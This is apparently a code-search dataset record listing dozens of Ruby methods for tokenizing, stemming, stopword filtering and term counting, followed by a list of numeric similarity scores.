"def refresh_tokens\n @tokens = self.class.dup_tokens\n\n if @token_filter\n @tokens.each{|t| @token_filter.call(t)}\n end\n\n tokens_to_find = tokens.each_with_index.map do |t, i|\n [i, t.string] if t.string\n end.compact\n\n @tokens_to_find_indexes = tokens_to_find.map{|t| t[0]}\n @tokens_to_find_strings = tokens_to_find.map{|t| t[1]}\n\n tokens_to_extract = tokens.each_with_index.map do |t, i|\n [i, t.name] if t.extract?\n end.compact\n\n @tokens_to_extract_indexes = tokens_to_extract.map{|t| t[0]}\n @tokens_to_extract_names = tokens.map{|t| t.name}\n\n @have_tokens_to_extract = (@tokens_to_extract_indexes.size > 0)\n end",
"def mass_tikify(text)\n sentences = NLP.sentences(text)\n\n sentences.map do |s|\n tokens = NLP.tokenize(s).reject do |t|\n # Don't include usernames/urls as tokens\n (t.include?(\"@\") && t.length > 1) || t.include?(\"http\")\n end\n\n tokens.map { |t| tikify(t) }\n end\n end",
"def rreduce(tokens)\n # NOTE scans from right to left\n size = tokens.size\n match = 1\n \n while match > 0 # last loop had any effect\n match = k = 0\n \n while k < tokens.size\n catch :done do\n self.class.reducers.each do |tags, block|\n # not enough tokens available\n next unless tokens.size - k >= tags.size\n \n mtokens = tokens[k, tags.size]\n \n # next unless all tags match\n next unless catch :fail do\n mtokens.zip(tags).each do |token,tag|\n case tag\n when Symbol, Module\n throw :fail unless token.include?(tag)\n when String\n throw :fail unless token.word == tag\n when Regexp\n throw :fail unless token.word =~ tag\n when Proc\n throw :fail unless tag.call(token)\n when nil\n # matches any token\n else\n throw :fail unless token.fetch(tag.class) == tag\n end\n end\n end\n \n object = block.call(self, *mtokens)\n if object.kind_of?(Token)\n puts \"@#{k}: OK #{tags.inspect}\" if options[:verbose]\n \n # restart parsing having replaced many tokens with one\n tokens[k, tags.size] = object\n # restart at beginning of array\n k = -1; match += 1\n throw :done\n else\n puts \"@#{k}: no #{tags.inspect}\" if options[:verbose]\n end\n end\n end\n \n k += 1\n end\n \n end\n tokens\n end",
"def getToolsStem( text)\n params = Hash.new\n params['text'] = text\n return doCurl(\"get\",\"/tools/stem\",params)\n end",
"def term_list\n terms = Array.new\n\n self.notes.each do |note|\n note.scrubbed_notes.each do |word|\n term_index = terms.index(word)\n if term_index.nil?\n terms.push(word)\n end\n end\n end\n terms\n end",
"def flatten(tokens)\n tokens.shift\n tokens.join(' ')\nend",
"def tokenize\n for c in @code.split(\" \").map(&:to_s)\n $tokens << getToken\n @code = @code.strip\n end\n $tokens\n end",
"def get_words(uid, stem = false)\n doc = Document.find(uid, term_vectors: true)\n add_dfs(doc)\n\n # This converts from a hash to an array like:\n # [[['word', pos], ['word', pos]], [['other', pos], ...], ...]\n word_list = doc.term_vectors.map do |k, v|\n [stem ? k.stem : k].product(v[:positions])\n end\n\n # Peel off one layer of inner arrays, sort it by the position, and\n # then return the array of just words in sorted order\n word_list.flatten(1).sort_by(&:last).map(&:first)\n end",
"def process\n tokenize(text).each do |word|\n token = TfIdfSimilarity::Token.new word\n if token.valid?\n @term_counts[token.lowercase_filter.classic_filter.to_s] += 1\n end\n end\n @size = term_counts.values.reduce(:+)\n end",
"def tokenize(data)\n return if data.nil?\n data = data.split(/\\W+/)\n if data.first == ''\n data = data.drop(1)\n end\n (0...data.size).each { |index|\n @total_words_counter += 1\n yield data[index] }\n end",
"def basic_stem\n # undo some euphonic changes so that we can recover\n # the basic stem\n form = @first_form.sub(/(?:μμαι)$/,'πμαι') # palatal\n form = form.sub(/(?:σμαι)$/,'τμαι') # dental\n form = form.sub(/(?:ουμαι)$/,'εομαι') # future contracted deponents\n\n # now remove the ending\n form.sub(/(?:ω|ον|α|ομαι|μαι|ην)$/,'')\n end",
"def mass_tikify(text)\n sentences = NLP.sentences(text)\n\n sentences.map do |s|\n tokens = NLP.tokenize(s).reject do |t|\n # Don't include usernames/urls as tokens\n t.include?('@') || t.include?('http')\n end\n\n tokens.map { |t| tikify(t) }\n end\n end",
"def respond(data_store, input, context)\n response_sentences = []\n\n @tagger.get_sentences(input).each do |sentence|\n response = []\n\n # select a random sentence from our 'sentence structure' table\n random_sentence = data_store.execute('SELECT * FROM post_sentences ORDER BY RANDOM() LIMIT 1').flatten.first\n tag(@tagger, random_sentence.titleize) do |token, tag|\n if should_replace(tag)\n response_token = nil\n\n # attempt to find bias tokens for this tag\n sentence.downcase.remove_punctuation.split.each do |input_token|\n query = 'SELECT * FROM post_tokens WHERE token=? AND tag=?'\n results = data_store.execute(query, [input_token, tag])\n puts \"#{input_token}, #{tag}: #{results.flatten.first}\"\n unless results.empty? || response.join.include?(input_token)\n response_token = results.flatten.first\n break\n end\n end\n\n # select a random word with the same tag our current token\n query = 'SELECT * FROM post_tokens WHERE tag=? ORDER BY RANDOM() LIMIT 1'\n response_token = data_store.execute(query, [tag]).flatten.first if response_token.nil?\n\n # default to the random sentence's token if we can't find anything else\n response_token = token if response_token.nil?\n else\n response_token = token\n end\n\n # add a space before our token, unless our token is punctuation\n response_token = \" #{response_token}\" unless tag.start_with?('PP')\n\n response << response_token\n end\n\n response_sentences << response.join.strip\n end\n\n return response_sentences.join(' ').strip\n end",
"def parse_new_lex filename\n\n\t\t@stemmizer = Stemmizer.new\n\n\t\tindex_es = Hash.new\n\n\t\tcon = RedisDB.new\n\t\tcon.connect_database 'stems'\n\n\t\tCSV.foreach(filename) do |row|\n\n\t\t\tstem_es = @stemmizer.stemmize row[0],'es'\n\n\t\t\tif(index_es.has_key? stem_es)\n\n\t\t\t\tindex_es[stem_es] = (index_es[stem_es].to_f + row[1].to_f).to_f/2\n\t\t\t\tcon.save_word 'stems_new_lex', stem_es, ((index_es[stem_es].to_f + row[1].to_f).to_f/2)\n\t\t\t\tputs(stem_es + ': ' + index_es[stem_es].to_s)\n\n\t\t\telse\n\n\t\t\t\tindex_es[stem_es] = row[1].to_f\n\t\t\t\tcon.save_word 'stems_new_lex', stem_es , row[1].to_f\n\t\t\t\tputs(stem_es + ': ' + index_es[stem_es].to_s)\n\n\t\t\tend\n\n\t\tend\n\n\tend",
"def farm_words(index, entry_content, freqs, word_counts)\n\twords = Sanitize.clean(entry_content.downcase).split(/[^a-zA-Z](?<!['\\-])/) \t# <= clean up & split the words\n\twords.each do |word|\n\t\tnext if !Blacklist.find_by_word(word).nil?\t\t\t\t\t\t\t\t\t\t\t\t\t# <= check against blacklist\n\t\tif freqs[word][index].nil?\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# <= if word doesn't exist yet\n\t\t\t(index - freqs[word].size).times { freqs[word] << 0\t}\t\t\t\t\t\t\t\t\t# <= add a zero for each entry until this one\n\t\t\tfreqs[word] << 1\n\t\telse\n\t\t\tfreqs[word][index] += 1\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# <= otherwise, just increment the count\n\t\tend\n\tend\n\tword_counts[index] += words.size\nend",
"def remove_stop_tokens(tokens, stop_words)\n\n # Looping through the list of tokens and removing all the stop words from the list\n for i in tokens\n if stop_words.member?(i)\n tokens.delete(i)\n end\n end\n \n return tokens\nend",
"def each \n if @array_words.length < 3\n return \"Length of the input_file is too small to produce trigrams\"\n end\n \n sentence = generate_sentence\n 0.upto(sentence.split.length - 1) do |x|\n yield sentence.split[x]\n end\n return sentence\n end",
"def process_stopwords(txt = self.search_text)\n #Needs to be set so highlighting will work properly (can't match quotes)\n self.highlight_token_array(txt)\n #Now put humpty dumpty back together without the nasty stopwords, sort the tokens by length\n self.search_token_array(txt).join(\" \")\n end",
"def stem_porter\n\n # make a copy of the given object and convert it to a string.\n w = self.dup.to_str\n \n return w if w.length < 3\n \n # now map initial y to Y so that the patterns never treat it as vowel\n w[0] = 'Y' if w[0] == ?y\n \n # Step 1a\n if w =~ /(ss|i)es$/\n w = $` + $1\n elsif w =~ /([^s])s$/ \n w = $` + $1\n end\n\n # Step 1b\n if w =~ /eed$/\n w.chop! if $` =~ MGR0 \n elsif w =~ /(ed|ing)$/\n stem = $`\n if stem =~ VOWEL_IN_STEM \n w = stem\n\tcase w\n when /(at|bl|iz)$/ then w << \"e\"\n when /([^aeiouylsz])\\1$/ then w.chop!\n when /^#{CC}#{V}[^aeiouwxy]$/o then w << \"e\"\n end\n end\n end\n\n if w =~ /y$/ \n stem = $`\n w = stem + \"i\" if stem =~ VOWEL_IN_STEM \n end\n\n # Step 2\n if w =~ SUFFIX_1_REGEXP\n stem = $`\n suffix = $1\n # print \"stem= \" + stem + \"\\n\" + \"suffix=\" + suffix + \"\\n\"\n if stem =~ MGR0\n w = stem + STEP_2_LIST[suffix]\n end\n end\n\n # Step 3\n if w =~ /(icate|ative|alize|iciti|ical|ful|ness)$/\n stem = $`\n suffix = $1\n if stem =~ MGR0\n w = stem + STEP_3_LIST[suffix]\n end\n end\n\n # Step 4\n if w =~ SUFFIX_2_REGEXP\n stem = $`\n if stem =~ MGR1\n w = stem\n end\n elsif w =~ /(s|t)(ion)$/\n stem = $` + $1\n if stem =~ MGR1\n w = stem\n end\n end\n\n # Step 5\n if w =~ /e$/ \n stem = $`\n if (stem =~ MGR1) ||\n (stem =~ MEQ1 && stem !~ /^#{CC}#{V}[^aeiouwxy]$/o)\n w = stem\n end\n end\n\n if w =~ /ll$/ && w =~ MGR1\n w.chop!\n end\n\n # and turn initial Y back to y\n w[0] = 'y' if w[0] == ?Y\n\n w\n end",
"def words\n sentences.map { |sentence| sentence.words.map { |word| word } } .flatten.each\n end",
"def pre_tokenize(text)\n normalized_text = text.gsub(/^every\\s\\b/, '')\n normalized_text = text.gsub(/^each\\s\\b/, '')\n normalized_text = text.gsub(/^on the\\s\\b/, '')\n normalized_text.downcase\n end",
"def read_tokens()\n\n # By adding @ to tokens, we're saving it also in the instance. We're not\n # going to use that, but it might be useful later.\n @tokens = []\n\n File.open(@filename) do |input_file|\n input_file.each do |line|\n line.split.each do |word|\n word = normalize(word)\n @tokens << word unless word.empty?\n end\n end\n end\n\n @tokens\n end",
"def tokenize(sentence)\n return [] if sentence.nil? || sentence.length == 0\n sentence.split(' ').map { |word| word.downcase.to_sym } # interesting that we symbolize words with punctuation ?!\n end",
"def recognize\n build_initial_itemset\n\n token_stream.each_with_index do |token, position|\n # if the previous invocation of this block did not populate list[position], then break out, because the parse has failed\n break if list[position].nil?\n \n # examine each item in list[position] only once...\n i = 0\n while i < list[position].size\n item = list[position][i]\n \n scan(token, item, position + 1)\n predict(item, position)\n complete(item, position)\n \n i += 1\n end\n end\n\n # run the predictor and completer on the last set in list, because it hasn't been predicted or completed yet.\n i = 0\n count = token_stream.count\n if list[count]\n while i < list[count].size\n item = list[count][i]\n \n predict(item, count)\n complete(item, count)\n \n i += 1\n end\n end\n \n # list.with_index{|arr,i| puts i; pp arr }\n \n # If the item set that resulted from processing the last token in the input contains an item \n # S -> ...•@1, that is, an item spanning the entire input and reducing to the start symbol,\n # we have found a valid parse!\n (list[token_stream.count] || []).any? do |item|\n item.non_terminal == grammar.start &&\n item.right_pattern.empty? &&\n item.position == 0\n end\n end",
"def process(input_stream)\n debug 'Beginning tokenization of input'\n\n @stream = input_stream\n @stream_char = 1\n\n @output = [] if @state == :root\n\n until @stream.strip.empty?\n tk = tokenize\n @output.append(tk) if tk.instance_of? Token\n end\n\n @output\n end",
"def export_synonyms(hits_per_page = 100, request_options = {}, &_block)\n res = []\n page = 0\n loop do\n curr = search_synonyms('', { :hitsPerPage => hits_per_page, :page => page }, request_options)['hits']\n curr.each do |synonym|\n res << synonym\n yield synonym if block_given?\n end\n break if curr.size < hits_per_page\n page += 1\n end\n res\n end",
"def extract\n # create hash of words with number of their instances in tokens excluding stopwords\n words_hash = Hash.new(0)\n @tokens.each { |w| \n unless w.empty? or stop_words_for(@language)[w]\n words_hash[w] += 1 \n end\n }\n\n idfs_hash = get_idfs(words_hash.keys)\n\n # calculate tf-idf for each word into keywords array\n keywords = []\n max_num = words_hash.values.max.to_f\n words_hash.each do |word, num|\n tf = num / max_num\n idf = idfs_hash[word]\n keywords << [word, (tf * idf).round(5), idf.round(5)]\n end\n\n # return keywords sorted by rank descending\n keywords.sort_by {|word, rank, idf| -rank}\n end",
"def stem\n _response_word.fetch(\"stem\", nil)\n end",
"def run_corpus # :nodoc:\n tokens = @processor.process\n tokens.each do |token|\n category = @db[token]\n @matches[category] << token if category # word's in corpus.\n end\n end",
"def words\n @phrase = @phrase.split(' ')\n end",
"def word_list\n # Returning only the terms of each definition as an array.\n list_of_terms = @words.map do |key, definition_instance|\n definition_instance.term\n end\n end",
"def tokens\n @tokens ||= scanner.tokenize(input)\n end",
"def words\n words = @phrase.split(\" \")\n words.each do |word|\n translate(word)\n end\n end",
"def bulk_tweet_shortener(array)\n replace= []\n \n array.each do |string|\n replace << string.split.each do |word| \n if dictionary.has_key?(\"#{word}\") == true\n word.replace(dictionary[\"#{word}\"])\n else word\n end\n end\n \n end \n\n replace.collect do |tweet| puts tweet.join(\" \") end\nend"
] | [
"0.7383151",
"0.64352137",
"0.63437766",
"0.6334966",
"0.61397344",
"0.5948949",
"0.58141166",
"0.57272047",
"0.5698453",
"0.56388116",
"0.56388116",
"0.5521572",
"0.55069983",
"0.5476669",
"0.5476669",
"0.54756314",
"0.54756314",
"0.5455903",
"0.5452764",
"0.5451128",
"0.5441654",
"0.5437673",
"0.5426502",
"0.5425493",
"0.5374424",
"0.53577024",
"0.5348645",
"0.5331603",
"0.53202343",
"0.5303031",
"0.52913386",
"0.52879274",
"0.52879274",
"0.526695",
"0.5266291",
"0.52658963",
"0.5264336",
"0.5233218",
"0.5218306",
"0.5190282",
"0.51893675",
"0.5182039",
"0.51714283",
"0.5160344",
"0.5160344",
"0.5158914",
"0.5146419",
"0.51263213",
"0.5117842",
"0.5114574",
"0.50837636",
"0.5081604",
"0.50759375",
"0.5070373",
"0.50700194",
"0.50535095",
"0.5052961",
"0.5037905",
"0.50356287",
"0.50356287",
"0.5027513",
"0.50258464",
"0.5019378",
"0.5017685",
"0.49952045",
"0.49757802",
"0.49636206",
"0.49635446",
"0.49623224",
"0.49563184",
"0.49503732",
"0.4948013",
"0.49460685",
"0.4945849",
"0.49440756",
"0.494126",
"0.4936631",
"0.4933707",
"0.49321052",
"0.49312317",
"0.4927943",
"0.4924566",
"0.4890093",
"0.4888344",
"0.48868737",
"0.48839",
"0.48775867",
"0.4869788",
"0.4855821",
"0.48478204",
"0.48428896",
"0.4841969",
"0.48414555",
"0.4840081",
"0.48285314",
"0.4826122",
"0.4821727",
"0.48206246",
"0.48149613",
"0.4811938"
] | 0.8478054 | 0 |
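A minimal usage sketch for the stem_tokens query above. It assumes a Porter-style stemmer gem that adds String#stem (the require name is an assumption; only word.stem appears in the source):

require 'stemmer' # assumed gem that monkey-patches String#stem

stem_tokens(["running", "jumps", "easily"])
# => ["run", "jump", "easili"] (exact stems depend on the stemmer implementation)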
get_title takes a file name and returns the text within the HTML title tag of the file | def get_title(file_name)
html = File.read(file_name)
doc = Nokogiri::HTML(html)
begin
# Grabbing the title from the page
title = doc.css("title")[0].text.strip
rescue NoMethodError
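    # Pages without a <title> element make doc.css("title")[0] nil, so .text raises; fall back to a nil title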
puts "NoMethodError"
puts file_name
title = nil
end
return title
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_title\n r = %r{((\\d+\\.)+\\s*)(?<title>(.)*)\\.html\\.erb}\n match = r.match(file_name)\n raise BadFilenameException, \"Can't match the file: #{file_name}\" unless match\n t = match[:title].strip\n end",
"def title\n CGI::unescape(file_name.to_s).gsub(/\\.\\w+$/, '').titleize\n end",
"def title\n CGI::unescape(file_name.to_s).gsub(/\\.\\w+$/, '').titleize\n end",
"def title\n CGI::unescape(self.file_name).gsub(/\\.\\w+$/, '').titleize\n end",
"def file_title(path)\n filename_from_path(path).split(\".\")[0]\n end",
"def title\n #Flip off the part after the last dot, including that dot: find the filename without extensions\n fragments = @filename.split('.')\n fragments.pop\n title = fragments.join('.')\n\n return title.gsub(/[_]/, ' ').capitalize\n end",
"def discover_file_title(page = current_page)\n\n if page.data.title\n return page.data.title # Frontmatter title\n else\n filename = page.url.split(/\\//).last.gsub('%20', ' ').titleize\n\n return filename.chomp(File.extname(filename))\n end\n end",
"def title\n #CGI::unescape(file_name.to_s).gsub(/\\.\\w+$/, '').titleize\n self[:file_name].gsub(/\\.\\w+$/, '').titleize rescue ''\n end",
"def title\n resource_title.presence || CGI.unescape(file_name.to_s).gsub(/\\.\\w+$/, '').titleize\n end",
"def title\n filename.nil? ? nil : File.basename(filename)\n end",
"def title\n if file =~ /README.md/\n result = File.basename File.dirname(file)\n else\n result = File.basename(file,'.md')\n end\n result.tr '-', ' '\n end",
"def to_title(file)\n # Strip .md if it exists\n title = file.gsub(/.md$/, '')\n\n title = title.gsub(/-/, ' ')\n title = title.gsub(/([A-Z][a-z])/, ' \\1').strip\n title = title.split.map { |word| word[0].upcase+word[1..99999] }.join(' ')\n return title\n end",
"def get_saved_title()\n begin\n return File.read(TITLE_FILE).strip!\n rescue => e\n return \"\"\n end\nend",
"def file_title(title)\n title.downcase.gsub(/\\s+/, '-').gsub(/-{2,}/, '-').gsub(':', '')\nend",
"def file_name(title)\n name = title.gsub(/[\\r\\n]/, \" \")\n .gsub(/[^a-zA-Z\\d\\s]/, \"\")\n .gsub(/ /, \"_\")\n\n name.length > 31 ? name[0..30] : name\n end",
"def file_name(title)\n name = title.gsub(/[\\r\\n]/, ' ')\n .gsub(/[^a-zA-Z\\d\\s]/, '')\n .tr(' ', '_')\n\n name.length > 31 ? name[0..30] : name\n end",
"def populate_title\n if self.title.blank?\n self.title = self.file_file_name.blank? ? \"\" : self.file_file_name.gsub(/_/, \" \").capitalize\n end\n\tend",
"def file_to_pagename(filename)\n\t\tfilename.chomp(\".md\").gsub('_', ' ').capitalize\n\tend",
"def file_to_pagename(filename)\n\t\tfilename.chomp(\".md\").gsub('_', ' ').capitalize\n\tend",
"def title\n @blob.basename.split(\".\").first.capitalize\n end",
"def pageTitle(url)\r\n<<<<<<< HEAD\r\n\r\nresult = open(url).read.scan(/<title>(.*?)<\\/title>/)[0]\r\n result[0]\r\n\r\n=======\r\n # Fetch and parse HTML document\r\n doc = Nokogiri::HTML(open(url))\r\n doc.search('title').children[0].text\r\n>>>>>>> d785f49315f21edd5329234273e9431f9c199eea\r\nend",
"def title\n @title ||= doc.search('.moviename-big').xpath('text()').text.strip\n end",
"def title\n return @title if @title\n return @filename if @filename\n return @type if @type\n return \"Unknown file name\"\n end",
"def title_folded_to_filename\n self[:title].gsub(/[^a-z0-9-]/) do |c|\n case c\n when /\\s+|\\./ then '-'\n when /[A-Z]+/ then c.downcase\n else ''\n end\n end.gsub(/\\-+/,'-')\n end",
"def title\n if has_local? :title\n locals[:title]\n else\n File.basename(logical_path).titleize\n end\n end",
"def title\n @basename.wikify\n end",
"def titre_in_file\n if File.exist? fullpath\n titre_in_code File.read(fullpath).force_encoding('utf-8')\n else\n debug \"= Fichier ID #{id} introuvable (#{fullpath}). Impossible de récupérer son titre\"\n \"\"\n end\n end",
"def page_content(title)\n\tFile.read(\"pages/#{title}.txt\")\n rescue Errno::ENOENT\n \treturn nil\n end",
"def set_title\n @title = File.basename(@absolute_path)\n @title.sub!(/^[0-9][0-9]-/, '')\n @title.gsub!(/_/, ' ')\n @title.gsub!(/-/, ', ')\n end",
"def quick_title(song)\n File.basename(song, File.extname(song)).gsub(/^[^A-Za-z]+\\s+(\\w)/, \"\\\\1\")\n end",
"def get_title\n @doc.css('title').text\n end",
"def create_filename(newpost)\n File.readlines(newpost).each do |line|\n tidytitle = ''\n # Extract title from the h2 line, and create tidytitle and filename\n if line =~ />\\w.*h2/\n # $& returns exact match, not entire line. Strip the tags surroundging the title.\n @title = $&.sub('>','').sub('</a></h2','') \n # Remove illegaal characters from title\n tidytitle = @title.downcase.gsub(/(#|%|&|\\*|<|>|\\{|\\}|\\\\|:|;|,|<|>|\\?|\\/|\\+|'|!|\\.)/,'').gsub(/ /,'-').gsub(/-+/,'-') + '.html'\n # Create filename preceded with datestamp\n @filename = @filedate + '-' + tidytitle\n break\n end\n end\nend",
"def title\n @title_pages.each { |tp| tp.title and return tp.title }\n nil\n end",
"def title(filename, _hue = 0)\n load_image(@title_cache, filename, Titles_Path, @title_data)\n end",
"def to_title(file_slug)\n if file_slug == 'index' && !@pointer['id'].index('/').nil?\n file_slug = @pointer['id'].split('/')[-2]\n end\n\n Ruhoh::StringFormat.titleize(file_slug)\n end",
"def extract_title(entry)\n if entry.title and not entry.title.empty?\n entry.title\n elsif entry.content && entry.content.first && entry.content.first.value.is_a?(String)\n content = entry.content.first.value\n \n if content.match(/^<?p?>?<(strong|h1|h2|h3|h4|b)>([^<]*)<\\/\\1>/i)\n $2\n else\n content.split(/\\n|<br ?\\/?>/).each do |line|\n potential_title = line.gsub(/<\\/?[^>]*>/, \"\").chomp # strip html\n break potential_title if potential_title and not potential_title.empty?\n end.split(/!|\\?|\\./).first\n end\n else\n \"Untitled\"\n end\n end",
"def fileset_title(filename)\n case parent\n when Numismatics::Coin\n coin_image_title(filename)\n else\n filename\n end\n end",
"def title\n @data.title ||= parsed_document.css('title').inner_html.gsub(/\\t|\\n|\\r/, '') rescue nil\n end",
"def extract_default_title\n\t\treturn self.name unless self.readme&.table_of_contents&.first\n\t\ttitle = self.readme.table_of_contents.first.text\n\t\ttitle ||= self.name\n\tend",
"def page_content(title)\n File.read(\"pages/#{title}.txt\")\nrescue Errno::ENOENT\n return nil\nend",
"def extract_title_from_page(page_path)\n f = File.open(page_path)\n file_contents = f.read\n f.close\n\n markdown_translator = Yuzu::Translators::Translator.translators[:markdown]\n markdown_translator.extract_title_from_contents(file_contents)\n end",
"def title\n doc.css(\"titleproper\").children.first.text.strip\n end",
"def title(title_name)\n h.content_tag :h2 do\n title_name.present? ? title_name : \"Perfis\"\n end\n end",
"def to_title(file_slug)\n file_slug.gsub(/[^\\p{Word}+]/u, ' ').gsub(/\\b\\w/){$&.upcase}\n end",
"def to_title(file_slug)\n if file_slug == 'index' && !@pointer['id'].index('/').nil?\n file_slug = @pointer['id'].split('/')[-2]\n end\n\n file_slug.gsub(/[^\\p{Word}+]/u, ' ').gsub(/\\b\\w/){$&.upcase}\n end",
"def set_title \n write_attribute(:title, File.basename(file_name, '.mp4')) if title.blank?\n end",
"def generate_filename(title)\n \"#{formatted_current_timestamp}-#{slug_for(title)}.md\"\nend",
"def title\n @title ||= (Nokogiri::HTML.parse(@html).title).to_s.gsub(/\\n|\\t|\\r/,\"\")\n end",
"def get_title\n base_title = get_name_or_logo\n @title.nil? ? base_title : \"#{base_title} | #{@title}\"\n end",
"def getTitle(doc)\n\tfirstLine = doc.strip[/^[^\\n]+(?=\\n|$)/]\n\tfirstLine.length <= TITLE_LENGTH ? firstLine : firstLine[0,TITLE_LENGTH-3]+\"...\"\nend",
"def get_title_for_link link\n begin\n doc = Nokogiri::HTML(open(link))\n node = doc.search('h1').first || doc.search('title').first\n node.xpath('.//text()').to_s.strip\n rescue\n # If something goes wrong, use link as a title.\n link\n end\nend",
"def page_title\n \"which fileset for #{path}\"\n end",
"def coin_image_title(filename)\n if /R/.match?(filename)\n \"Reverse\"\n elsif /O/.match?(filename)\n \"Obverse\"\n else\n filename\n end\n end",
"def get_title\n title = @doc.css(\"div.headline h1\").text.gsub(\" From Our Partners\", \"\")\n end",
"def get_page_title(page_doc)\n\treturn page_doc.css('title').text.strip\nend",
"def find_title(url)\n # In three \"easy\" steps:\n # 1. Use \"open\" to download the contents of URL\n # 2. Use one of the methods described below to extract the\n # contents of the title tag.\n # 3. Return the contents of the title tag.\n page = Nokogiri::HTML(open(url))\n links = page.css(\"title\")\n\n return links.text\nend",
"def title\n return @title if @title\n if matches = class_const(:TITLE_RE).match(page)\n @title = matches[1].to_s.strip\n title_processor\n @title = decode_entities(@title)\n end\n end",
"def file_name\n # file = full_name\n # file = file.gsub('::', '/')\n # file = file.gsub('#' , '/')\n # file = file.gsub('.' , '-')\n # #file = File.join(output, file + '.html')\n # file\n WebRI.entry_to_path(full_name)\n end",
"def discover_directory_title(name, directory_path)\n\n # Check for a .display_info file in the source directory\n display_info_file_path = File.join(\"source\", directory_path, \".display_info\")\n\n if File.file?(display_info_file_path)\n\n display_info_hash = YAML.load_file(display_info_file_path)\n\n return display_info_hash.has_key?(\"title\") ? display_info_hash[\"title\"] : \"No Title Key Set\"\n else\n\n # No file found, so just parse the directory name\n return name.gsub(\"%20\", \" \").titleize\n end\n end",
"def title\n @title ||= self.content.split(@@title_separator).first unless self.content.nil?\n end",
"def get_h2_titles_from_rendered_contents(website_file)\n title_regex = Regexp.new('<h2[^>]*?>([\\w\\W]*?)</h2>')\n title_matches = website_file.rendered_contents.scan(title_regex)\n title_matches.collect {|m| m[0].to_s}\n end",
"def title\n @title ||= parsed_document.css('title').inner_text rescue nil\n end",
"def read_draft_title\n match = read.match(/title:\\s+(.+)?$/)\n match[1] if match\n end",
"def fix_title t\n # remove .html\n t1 = t.sub(/\\.html$/,'')\n # add /wiki/ unless it exists\n if t1.index(\"/wiki/\")\n return t1\n end\n return \"/wiki/\" + t.sub(/\\.html$/,'')\nend",
"def fix_title t\n # remove .html\n t1 = t.sub(/\\.html$/,'')\n # add /wiki/ unless it exists\n if t1.index(\"/wiki/\")\n return t1\n end\n return \"/wiki/\" + t.sub(/\\.html$/,'')\nend",
"def title(params = {})\n reload_metadata() if params[:reload]\n return self.api_file.title\n end",
"def title\n @doc.xpath(\"/html/head/title\").first&.text\n end",
"def page_title \n raw %(<title>#{page_title_raw}My USA Coin</title>)\n end",
"def title\n @title ||= Utilities.longest_common_substring_in_array(titles.values) \n @title = titles[:og_title] unless title_ok?\n @title = titles[:html_title] unless title_ok?\n @title = titles[:from_doc] unless title_ok?\n\n @title\n end",
"def filename\n @basename + PAGE_FILE_EXT\n end",
"def title\n CGI::unescape(image_name.to_s).gsub(/\\.\\w+$/, '').titleize\n end",
"def page_title title= nil\n\t\tif title\n\t\t\tcontent_for(:page_title) { \"#{title} - 2da.re\" }\n\t\t\treturn title\n\t\telse\n\t\t\tcontent_for?(:page_title) ? content_for(:page_title) : \"Ready 2da.re?\"\n\t\tend\n\tend",
"def get_title(url)\n Mechanize.new.get(url).title\n end",
"def title\n title_raw.downcase\n end",
"def name; (page.title rescue ''); end",
"def name; (page.title rescue ''); end",
"def title(page_title = nil)\n if page_title\n content_for(:title) do\n page_title\n end\n else\n content_for(:title) do\n \"DateIdeas.ca\"\n end\n end\n end",
"def extract_title\n at_css('title').text\n end",
"def title()\n @markdown_document.title()\n end",
"def rendered_name\n result = filename\n result = caption if !caption.blank?\n result\nend",
"def raw_title\n document.at(\"h1\").innerText\n end",
"def get_video_title(youtube_url)\n doc = Hpricot(open(youtube_url))\n (doc/\"title\").each do |title|\n return $1 if title.inner_text =~ %r{YouTube - (.+)}\n end\nend",
"def fetch_title_by_using_stdlib(uri)\n match = uri.read.scan(/<title>(.*?)<\\/title>/i)\n return \"\" unless match.first && match.first.first\n\n match.first.first\n end",
"def get_display_title(title)\n page_info_get_val(title, 'displaytitle', 'displaytitle')\n end",
"def title\n @title ||= details.at(\"h1.header\").text.strip rescue nil\n end",
"def scrape_title( page )\n\t\tpage.title.split( ' - ' )[0]\n\tend",
"def get_filename(pagename)\n\t\tget_permalink(pagename) + \".md\"\n\tend",
"def get_filename(pagename)\n\t\tget_permalink(pagename) + \".md\"\n\tend",
"def title(title)\n filename(title)\n @methods[:title] = title\n end",
"def title\n name.gsub(/_/, ' ')\n end",
"def get_title(n)\n description = Nokogiri::HTML(@description_xpath[n].text).text\n if description.include?(\"IF YOU GO\")\n description = description.split(\"IF YOU GO\")[1]\n if description.include?(\"Where\")\n title = description.split(\"Where\")[0]\n # Title must fit on single line\n title.gsub!(\"\\n\", \" \").strip!\n title\n else\n super(n)\n end\n else\n super(n)\n end\n end",
"def text_name\n title.to_s.t.html_to_ascii\n end",
"def page_title(title)\n content_for_wrapper(:page_title, title)\n end",
"def show\n @title = @stocked_file.original_name\n end",
"def title(page_title)\n content_for :title do\n page_title\n end\n end",
"def full_title(page_title = '')\n base_title = \"WriteIt\"\n if page_title.empty?\n base_title\n else\n page_title + \" | \" + base_title\n end\n end",
"def document_show_html_title\n @document[Blacklight.config[:show][:html_title]]\n end",
"def page_content(title)\n File.read(\"pages/#{title}.txt\")\nrescue Errno::ENOENT #if file isn't there, we just won't get anything back \n return nil\nend",
"def title\n @title ||= parsed.css('head title').inner_text rescue nil\n end",
"def title\n Sanitize.clean(name).strip\n end"
] | [
"0.8598528",
"0.8095545",
"0.80953485",
"0.80056685",
"0.79147553",
"0.78786373",
"0.78640026",
"0.7862644",
"0.7758443",
"0.7724523",
"0.75914115",
"0.7350282",
"0.73062795",
"0.72698486",
"0.72686887",
"0.7233489",
"0.72191924",
"0.7095204",
"0.7095204",
"0.70673436",
"0.703212",
"0.7022024",
"0.6974123",
"0.69501436",
"0.69418436",
"0.69102484",
"0.68808454",
"0.68607074",
"0.6859951",
"0.68521464",
"0.6850888",
"0.68484885",
"0.6846924",
"0.680202",
"0.67598855",
"0.6745066",
"0.6720404",
"0.6713292",
"0.67003244",
"0.6689516",
"0.6678787",
"0.6664226",
"0.6653804",
"0.66528565",
"0.66279614",
"0.6625007",
"0.66028816",
"0.6602669",
"0.66022325",
"0.66018534",
"0.6599151",
"0.65970683",
"0.65914524",
"0.6586695",
"0.65842104",
"0.65836084",
"0.65572405",
"0.65515417",
"0.65463895",
"0.6531143",
"0.652057",
"0.6520003",
"0.65198684",
"0.6511911",
"0.6511911",
"0.6492646",
"0.6492089",
"0.6478964",
"0.64638674",
"0.64633214",
"0.64615566",
